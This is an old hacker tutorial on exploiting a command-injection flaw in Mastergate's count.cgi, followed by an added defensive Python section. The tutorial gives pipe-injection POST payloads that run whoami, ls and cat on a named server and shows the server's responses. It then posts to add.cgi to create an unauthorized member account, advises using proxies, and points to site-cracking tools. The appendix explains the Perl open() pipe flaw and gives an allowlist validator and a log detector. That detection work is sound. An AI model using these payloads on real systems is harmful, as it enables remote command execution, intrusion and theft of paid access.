(Written By ZenDraL)

All right guys, here's a simple exploit for count.cgi. I know a lot of people say you have to learn to exploit all on your own. And while I agree that being spoon fed everything is pointless, sometimes seeing how something is done once can help you learn other things :) So here's an exploit that won't get you on all the greatest sites out there, but will give you a basic idea of how to exploit a site. This is my first tutorial so be patient. Constructive criticism is welcome :) Flame if you will, but just know that if you do I'll anally rape your mom while pouring sugar in your gas tank. J/K :)

Just on a side note before we get started, I have received a good number of requests for either sites to be cracked or how it's done. So for all of you that are curious, I use AccessDiver (http://www.acccessdiver.com), and several good tutorials are available on http://www.deny.de and http://www.securibox.net.

You will really only need two things:
A) Triton
B) A working proxy
** Optionally a TXT file containing a list of URLs. **
AccessDiver (for its HTTP Debugger)

Triton is an application that we will use to verify whether a site is vulnerable to this exploit.

In Triton under the Sites tab:
-Input the site that you would like to check (or a list of URLs).
-Make sure the Count As Bad box is checked in the Redirects area.
-Make sure the Automatically save hits box is checked, and designate a file for your results.

Under the Paths tab input the following data:
Path: /cgi-bin/mastergate/count.cgi
Post Data: pinfile=|echo;whoami;exit|
Good Keywords: nobody (the account most web servers of the time ran CGI scripts as; if it shows up in the response, whoami ran on the server)
Bad Keyword: error

Under the Connections tab:
Make sure to use a proxy at all times!!! Input a single proxy, or use multiple proxies if you are scanning a list.

Now you are ready to find a vulnerable site. Once you have found a site, open your HTTP Debugger (CTRL + F9 in AccessDiver / under the Tools tab in Triton). For the address you're going to want to input the weak URL which we found.
Example:
Address: worldclasserotica.com/cgi-bin/mastergate/count.cgi
Method: Post
Post Value: pinfile=|echo;ls;exit|

--Output from Debugger
HTTP/1.1 200 OK
Date: Tue, 02 Sep 2003 19:06:09 GMT
Server: Apache/1.3.19 (Unix) PHP/4.0.4pl1
Content-Type: text/plain
Proxy-Connection: Close

9420100
9420101
9420102
9420103
9420500
accountcreate.cgi
add.cgi
admin
cancel.cgi
configure.cgi
count.cgi
database
delete.cgi
log
modify.cgi
passwords
restore.cgi
search.cgi
Content-type: text/html

0 pincodes left in account |echo;ls;exit|
--End of Output

Here we can see several different files that look interesting. You can explore on your own (and are advised to), but for today we'll just look at add.cgi. In the HTTP Debugger replace the post value "pinfile=|echo;ls;exit|" with "pinfile=|echo;cat add.cgi;exit|". This will output the script that the site uses to add accounts to its database. The following snippet of code is what we will use to add our own password to the site.

--Code from add.cgi
&refergate;
$expire=$FORM{'expire'};
$pincode=$FORM{'pincode'};
$username=$FORM{'username'};
$password = $FORM{'password'};
$transaction = $FORM{'transaction'};
$subscription = $FORM{'subscription'};
$billingmethod = $FORM{'billingmethod'};
--End

At this point change your HTTP Debugger settings to:
Address: worldclasserotica.com/cgi-bin/mastergate/add.cgi
Post Value: expire=&pincode=&username=desiredusername&password=desiredpassword&transaction=&subscription=&billingmethod=

Well that's it guys, use it wisely, have fun. :)

ZenDraL 09/02/2003
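The post data shape used above (a value wrapped in a leading and a trailing | character) is the classic Perl two-argument open() pipe injection: a filename that begins or ends with | is treated by open() as a command to run rather than a file to read. What follows is an added defensive example in Python; it is not part of the original tutorial and not code from the Mastergate scripts. It shows the allowlist check a CGI should apply to a parameter like pinfile before using it as a filename, and runs that same check over a few constructed log lines so the injection attempt can be spotted in recorded traffic. The function names, the "METHOD PATH BODY" log format and the sample lines are my own assumptions.

```python
import re
from urllib.parse import parse_qs

# Allowlist: a pinfile name is a plain basename made of letters, digits,
# underscore, dot and dash. Anything else (pipes, semicolons, slashes,
# spaces, newlines) is refused outright.
SAFE_PINFILE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

# Shell metacharacters, used only to explain *why* a value was refused.
SHELL_META = re.compile(r"[|;&`$<>\n]")


def is_safe_pinfile(value: str) -> bool:
    """Return True only if the value could safely be used as a filename.

    Rejects empty strings, parent-directory components ('..') and any
    character outside the allowlist.
    """
    if not SAFE_PINFILE.fullmatch(value):
        return False
    if ".." in value:
        return False
    return True


def classify_post_body(body: str) -> dict:
    """Parse a URL-encoded POST body and describe its pinfile parameter."""
    params = parse_qs(body, keep_blank_values=True)   # also percent-decodes
    pinfile = params.get("pinfile", [""])[0]
    return {
        "pinfile": pinfile,
        "safe": is_safe_pinfile(pinfile),
        # leading or trailing '|' is exactly the two-arg open() pipe form
        "pipe_open": pinfile.startswith("|") or pinfile.endswith("|"),
        "shell_meta": bool(SHELL_META.search(pinfile)),
    }


# Constructed sample log lines (not taken from any real server) in an
# assumed "METHOD PATH BODY" format, as a reverse proxy or WAF might record.
SAMPLE_LOG = [
    "POST /cgi-bin/mastergate/count.cgi pinfile=member1234",
    "POST /cgi-bin/mastergate/count.cgi pinfile=%7Cecho%3Bwhoami%3Bexit%7C",
    "POST /cgi-bin/mastergate/count.cgi pinfile=member+1234",
    "GET /index.html ",
]


def find_suspicious(log_lines):
    """Return (line_number, decoded pinfile) for every count.cgi request
    whose pinfile value fails the allowlist check."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue
        method, path, body = parts
        if not path.endswith("/count.cgi"):
            continue
        info = classify_post_body(body)
        if not info["safe"]:
            hits.append((n, info["pinfile"]))
    return hits


if __name__ == "__main__":
    for n, value in find_suspicious(SAMPLE_LOG):
        print(f"line {n}: refused pinfile {value!r}")
```

The allowlist refuses more than a blocklist of shell metacharacters would (the third sample line fails on a space alone), which is the point: decide what a valid filename looks like and reject everything else instead of enumerating bad characters. In the Perl these CGI scripts are written in, the equivalent fix is the same validation plus the three-argument form open(my $fh, '<', $pinfile), which never interprets a | in the filename as a pipe.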